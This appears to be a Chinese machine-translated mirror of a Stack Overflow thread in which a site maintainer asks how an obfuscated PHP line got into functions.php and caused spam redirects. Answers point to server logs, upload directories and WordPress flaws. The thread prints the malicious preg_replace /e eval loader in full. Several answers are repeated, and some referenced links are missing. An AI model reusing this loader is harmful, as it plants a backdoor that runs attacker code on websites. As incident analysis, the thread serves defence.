Fatal编程技术网
  • php/
  • 注入PHP代码以执行301

注入PHP代码以执行301

php apache

注入PHP代码以执行301,php,apache,Php,Apache,在我帮助mantain的一个网站上,我是如何设法以一种非常特殊的方式受到攻击的,我正在调查服务器是否被直接入侵,或者是否有人能够以某种方式注入恶意脚本 首先有人设法得到了这个: @preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\13

在我帮助mantain的一个网站上,我是如何设法以一种非常特殊的方式受到攻击的,我正在调查服务器是否被直接入侵,或者是否有人能够以某种方式注入恶意脚本

首先有人设法得到了这个:

@preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x62\146\x77\75\x39\60\x35\70\x37\73","\x4c\62\x35\157\x59\156\x4d\166\x64\62\x56\151\x4c\62\x78\160\x64\155\x55\166\x61\110\x52\153\x62\62\x4e\172\x4c\63\x52\154\x63\63\x51\166\x62\107\x56\62\x5a\127\x77\171\x58\63\x52\154\x63\63\x51\166\x62\107\x39\156\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");
进入PHP文件的最顶端,在文件注释之后。这和其他代码一样,是301将任何未通过浏览器连接到该网站的人重定向到发薪日贷款网站。这只影响了我的主页,所有其他页面都很好

可能有更多的代码可以执行此操作,但这是最令人困惑的部分,因为此代码位于名为
functions.php
的文件中,该文件仅包含在index.php(我的主页)中,但它是第一个包含在index.php中的文件

这让我完全困惑,为什么有人可以在那里获得代码而不直接入侵服务器,那里没有用户输入,它实际上位于整个文件之上。除了这段注入的代码和上面的一些注释之外,这里什么都没有

我的envo是:

Gentoo

PHP 5.2.14-pl0-gentoo

阿帕奇2

我检查了服务器日志,但和往常一样,他们删除了跟踪记录

正如你们所注意到的,这在一定程度上也是一个服务器问题,但atm是90%的编程问题,所以我想我会先在这里问它

PHP中是否存在可能导致此问题的漏洞

如果你需要澄清,请告诉我

编辑 我有一个登台系统,它有一个

  • 工作
  • 预演
  • 生活
我知道这与SQL注入无关,因为如果我切换live和preview文件夹,我不会遇到任何问题。我也不在DB或应用程序中存储gentoo密码,您只能在一小部分IP地址中连接到服务器,Apache除外,它接受来自任何主机的80和443连接。另外,我在站点中使用SQL转义类和方法(PDO、MySQLi等)

因此,这个问题(更令人困惑的是)只存在于我的站点的一个副本中,而不是数据库或任何东西。

99%的可能性是Web服务器故障,SQL注入是一回事,但我不知道,也许他们设法通过SQL注入获得了您的密码,然后登录到控制面板或ftp,但是,我会说这是Web服务器。

99%的可能性是Web服务器故障,SQL注入是一回事,但我不知道,也许他们设法通过SQL注入获得了您的密码,然后登录到控制面板或ftp,但是,我会说这是Web服务器。

我想,查明这类事情更多地是在服务器管理方面。检查攻击者修改的文件日期,并在服务器日志(apache日志、FTP日志、ssh日志)中查找该日期和时间内的可疑活动。这也可能取决于您的流量、日志大小和对服务器的访问级别,因为这可能是禁止的。如果您有任何上载文件的html表单,请验证存储文件的目录。还要检查该目录上的权限。如果您在共享主机上,这也可能是攻击者在另一个站点上注入shell,然后通过这种方式攻击您的站点的结果。在这种情况下,请与您的托管公司联系。

我想确定这类事情更多的是在服务器管理方面。检查攻击者修改的文件日期,并在服务器日志(apache日志、FTP日志、ssh日志)中查找该日期和时间内的可疑活动。这也可能取决于您的流量、日志大小和对服务器的访问级别,因为这可能是禁止的。如果您有任何上载文件的html表单,请验证存储文件的目录。还要检查该目录上的权限。如果您在共享主机上,这也可能是攻击者在另一个站点上注入shell,然后通过这种方式攻击您的站点的结果。在这种情况下,请与您的托管公司联系。

好的,我现在就知道如何以及为什么了。这是我认为永远不会发生的事情:Wordpress

我基本上是一个受害者:

使用以下工具:

您可以看到,尽管我的主站点不是由wordpress创建的,并且它有一个wordpress博客位于:
/blog/
,但黑客能够使用各种wordpress漏洞绕过位置问题,并在服务器的任何部分安装脚本

顺便说一下,这实际上发生在最新安装的Wordpress上。仔细检查版本。我们不能完全确定他到底是在什么时候放置脚本的(多年来有多个外国脚本放置的实例!),但我们知道最近的攻击一定也是在最近发生的,这使得最新版本(或以前的版本)受到了大量的审查

关于Wordpress有一个很好的注意事项…

好了,我现在明白了怎么做和为什么了。这是我认为永远不会发生的事情:Wordpress

我基本上是一个受害者:

使用以下工具:

您可以看到,尽管我的主站点不是由wordpress创建的,并且它有一个wordpress博客位于:
/blog/
,但黑客能够使用各种wordpress漏洞绕过位置问题,并在服务器的任何部分安装脚本

顺便说一下,这实际上发生在最新安装的Wordpress上。仔细检查版本。我们不能完全确定他到底是在什么时候放置脚本的(多年来有多个外国脚本放置的实例!),但我们知道最近的攻击一定也是在最近发生的,这使得最新版本(或以前的版本)受到了大量的审查

关于Wordpress有一个很好的注意事项…

@MihaiIorga我认为超级用户提出的问题与此不同,如果这个问题以另一种方式分类,它将是您的问题